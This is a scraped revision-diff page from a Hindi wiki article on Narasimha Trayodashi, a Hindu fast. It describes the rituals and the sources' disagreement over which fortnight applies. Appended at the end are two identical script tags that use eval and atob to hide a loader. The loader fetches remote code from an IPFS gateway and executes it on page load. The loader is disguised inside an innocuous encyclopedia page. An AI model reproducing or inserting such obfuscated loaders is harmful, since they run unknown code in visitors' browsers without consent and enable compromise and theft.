Difference between revisions of "नरसिंह त्रयोदशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(One intermediate revision by the same user not shown)
Line 4: Line 4:
 
*श्वेत वस्त्र से आच्छादित एक घट प्रतिष्ठापित किया जाता है और पर एक स्वर्णिम या काष्ठ की या बाँस की प्रतिमा रखी जाती है।
 
*श्वेत वस्त्र से आच्छादित एक घट प्रतिष्ठापित किया जाता है और पर एक स्वर्णिम या काष्ठ की या बाँस की प्रतिमा रखी जाती है।
 
*उस दिन किसी [[ब्राह्मण]] को वह प्रतिमा दे दी जाती है।<ref>हेमाद्रि (व्रतखण्ड 1, 1029-30, [[वराह पुराण]] 42|1-7 एवं 13-16 का उद्धरण है)।</ref>   
 
*उस दिन किसी [[ब्राह्मण]] को वह प्रतिमा दे दी जाती है।<ref>हेमाद्रि (व्रतखण्ड 1, 1029-30, [[वराह पुराण]] 42|1-7 एवं 13-16 का उद्धरण है)।</ref>   
*प्रकाशित वराहपुराण में ऐसी व्यवस्था है कि व्रत शुक्ल पक्ष में किया जाए, किन्तु हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड1, 1029)</ref> में कृष्ण पक्ष का उल्लेख है।
+
*प्रकाशित वराहपुराण में ऐसी व्यवस्था है कि व्रत शुक्ल पक्ष में किया जाए, किन्तु हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड1, 1029</ref> में कृष्ण पक्ष का उल्लेख है।
 
 
 
 
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:35, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • phalgun krishna paksh ki dvadashi ko yah vrat arambh hota hai.
  • us din upavas evan narasianh pratima ki pooja ki jati hai.
  • shvet vastr se achchhadit ek ghat pratishthapit kiya jata hai aur par ek svarnim ya kashth ki ya baans ki pratima rakhi jati hai.
  • us din kisi brahman ko vah pratima de di jati hai.[1]
  • prakashit varahapuran mean aisi vyavastha hai ki vrat shukl paksh mean kiya jae, kintu hemadri[2] mean krishna paksh ka ullekh hai.

 

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 1029-30, varah puran 42|1-7 evan 13-16 ka uddharan hai).
  2. hemadri (vratakhand1, 1029

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>